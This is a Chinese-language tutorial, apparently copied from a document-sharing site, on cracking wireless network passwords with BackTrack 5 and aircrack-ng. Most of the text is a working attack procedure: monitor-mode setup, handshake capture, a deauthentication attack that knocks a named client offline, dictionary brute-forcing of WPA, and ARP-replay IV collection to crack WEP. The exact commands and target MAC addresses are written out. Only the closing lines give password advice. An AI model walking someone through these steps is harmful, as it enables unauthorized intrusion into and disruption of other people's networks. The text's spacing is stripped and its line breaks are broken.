bt5破解无线密码wpa暴力破解.docx
《bt5破解无线密码wpa暴力破解.docx》由会员分享,可在线阅读,更多相关《bt5破解无线密码wpa暴力破解.docx(8页珍藏版)》请在冰豆网上搜索。
bt5破解无线密码wpa暴力破解
首先查看网络连接:
root@bt:
~#ifconfig-a#查看所有连接
激活无线网卡
root@bt:
~#ifconfigwlan0up
设置无线网卡为混杂模式
root@bt:
~#airmon-ngstartwlan0
再次查看网络连接发现多了个mon0接口,以下就通过mon0开始破解无线网络
root@bt:
~#ifconfig-a
破解WPA网络
首先找到目标,看哪个网络容易破解,一般有客户端连接的路由器才比较容易破解
root@bt:
~#airodump-ngmon0
锁定目标,开始尝试破解目标网络
抓包保存
root@bt:
~#airodump-ng-c11-w20121025mon0
参数说明:
-c指定扫描信道
-c11只扫描信道为11的无线网线
-w保存数据包到文件
现在的WPA破解只能是通过暴力破解,主要抓到客户端与路由器的握手包(handshake)就有可能通过字典猜解,
在有客户端连接的情况下,可以用deauh攻击让客户端下线,客户端一般都会自动连接,这时就可以抓到握手包了。
对客户端进行deauth攻击
root@bt:
~#aireplay-ng-03-aE0:
05:
C5:
A7:
BB:
92-c98:
0C:
82:
AC:
1A:
10mon0
参数说明:
-0攻击模式是deauth,-03发送3次deauth攻击
-aAP的mac地址
-c客户端地址
注入后我连接到路由器的手机马上掉线,过几秒钟又自动连接了
攻击的时候同时抓包,抓包窗口会提示抓到握手包:
WPAhandshake:
E0:
05:
C5:
A7:
BB:
92
deauth攻击的目的已经达到,现在可以停止抓包了,开始破解WPA密码:
root@bt:
~#aircrack-ng-wWPA.txt20121025-01.cap
参数说明:
-w字典文件
选择有handshake的无线网络,开始破解
WPA.txt是事先在网上下载好的无线WPA字典,包含一些常用的密码和生日密码等等
生日密码被秒破了【惊恐】!
!
!
破解WEP无线网络
WEP破解是100%能破解出来的,不管多复杂的密码,只要能够抓够足够的IVS
还是先查找目标网络:
root@bt:
~#airodump-ng–encryptWEPmon0#只抓WEP加密的网络
找到目标网络之后开始抓包保存
root@bt:
~#airodump-ng–ivs-w20121025-c11mon0
为了能快速收集IVS,在有客户端的情况下进行ARPREQUEST攻击
root@bt:
~#aireplay-ng-3-bE0:
05:
C5:
A7:
BB:
92-h98:
0C:
82:
AC:
1A:
10mon0
收到5000个以上IVS之后,就可以破解了,如果破解不成功再多收集IVS
root@bt:
~#aircrack-ng–ivs20121025*.ivs
破解成功!
wep加密基本是100%破解成功,所以一般不要设置加密方式为WEP,不过不要以为wpa/wpa2加密就高枕无忧了,
WPA密码要设置尽量杂点,不要用纯数字,8~10位的纯数字密码一般的破解字典都有。